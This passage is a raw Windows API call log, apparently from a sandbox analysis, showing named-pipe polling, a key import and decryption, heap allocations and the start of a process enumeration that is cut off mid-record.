lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x33, lpOverlapped=0x0) returned 1 [0115.906] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.933] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.933] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.971] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.971] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.996] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x3f, lpBytesLeftThisMessage=0x0) returned 1 [0116.002] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x3f, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x3f, lpOverlapped=0x0) returned 1 [0116.007] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0116.318] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.318] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0116.343] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.343] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0116.386] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.386] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0116.467] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.467] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0116.969] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.969] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0117.303] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.303] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0117.328] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.328] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0119.016] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.016] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0119.495] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.495] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0119.568] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.568] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0123.286] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.286] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0123.601] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.602] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0124.050] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.050] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0124.287] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.288] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0125.175] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.175] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0125.217] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.217] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0125.482] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.482] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0125.640] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.640] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.437] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.437] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.476] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.476] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.513] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.513] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.549] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.549] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.597] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.598] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.967] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.967] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0126.994] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.994] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0127.028] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0127.028] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0127.065] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x1c, lpBytesLeftThisMessage=0x0) returned 1 [0127.065] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x1c, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x1c, lpOverlapped=0x0) returned 1 [0127.067] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0127.118] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0127.119] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0127.163] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x2d, lpBytesLeftThisMessage=0x0) returned 1 [0127.163] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x2d, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x2d, lpOverlapped=0x0) returned 1 [0127.164] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x0 [0127.164] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0127.164] GetExitCodeProcess (in: hProcess=0x114, lpExitCode=0x18f87c | out: lpExitCode=0x18f87c*=0x0) returned 1 [0127.164] CloseHandle (hObject=0x110) returned 1 [0127.164] CloseHandle (hObject=0x114) returned 1 [0127.164] CloseHandle (hObject=0xa4) returned 1 [0127.165] CloseHandle (hObject=0xac) returned 1 [0127.165] CloseHandle (hObject=0xb0) returned 1 [0127.165] CloseHandle (hObject=0x10c) returned 1 [0127.165] GetProcessHeap () returned 0x550000 [0127.165] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567fb8 | out: hHeap=0x550000) returned 1 [0127.186] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0127.186] GetProcessHeap () returned 0x550000 [0127.186] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569b50 | out: hHeap=0x550000) returned 1 [0127.187] GetProcessHeap () returned 0x550000 [0127.187] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x400) returned 0x56e260 [0127.187] CryptImportKey (in: hProv=0x564928, pbData=0x18fc68, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0127.187] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56e260, pdwDataLen=0x18fcd8 | out: pbData=0x56e260, pdwDataLen=0x18fcd8) returned 1 [0127.188] CryptDestroyKey (hKey=0x5699c8) returned 1 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566ac0 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x567fb8 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566ae0 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x5680d0 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566af0 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1e) returned 0x568008 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b00 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568030 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b10 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c) returned 0x568148 [0127.188] GetProcessHeap () returned 0x550000 [0127.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b20 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x568b98 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b30 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x568bb8 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b40 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x568bd8 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b50 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568198 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b60 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568210 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b70 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22) returned 0x5699c8 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b80 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x568238 [0127.189] GetProcessHeap () returned 0x550000 [0127.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566b90 [0127.189] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c) returned 0x568260 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566ba0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2a) returned 0x56cb70 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566bb0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1e) returned 0x568288 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566bc0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x568bf8 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566bd0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x24) returned 0x56e680 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566be0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5682b0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566bf0 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x568c18 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566c00 [0127.190] GetProcessHeap () returned 0x550000 [0127.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x568c38 [0127.190] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566c10 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c) returned 0x5682d8 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566c20 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1e) returned 0x568300 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566c30 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x568c58 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566c40 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x26) returned 0x56e6b0 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ee80 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x568c78 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ee90 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568328 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56eea0 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568350 [0127.191] GetProcessHeap () returned 0x550000 [0127.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56eeb0 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x568c98 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56eec0 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x568cb8 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56eed0 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x568cd8 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56eee0 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568378 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56eef0 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x568cf8 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ef00 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x568d18 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ef10 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x5683a0 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ef20 [0127.192] GetProcessHeap () returned 0x550000 [0127.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5683c8 [0127.193] GetProcessHeap () returned 0x550000 [0127.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ef30 [0127.193] GetProcessHeap () returned 0x550000 [0127.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x568d38 [0127.193] GetProcessHeap () returned 0x550000 [0127.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ef40 [0127.193] GetProcessHeap () returned 0x550000 [0127.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x568d58 [0127.193] GetProcessHeap () returned 0x550000 [0127.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x56ef50 [0127.193] GetProcessHeap () returned 0x550000 [0127.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x568d78 [0127.193] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c [0127.202] Process32FirstW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.203] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0127.203] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.204] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 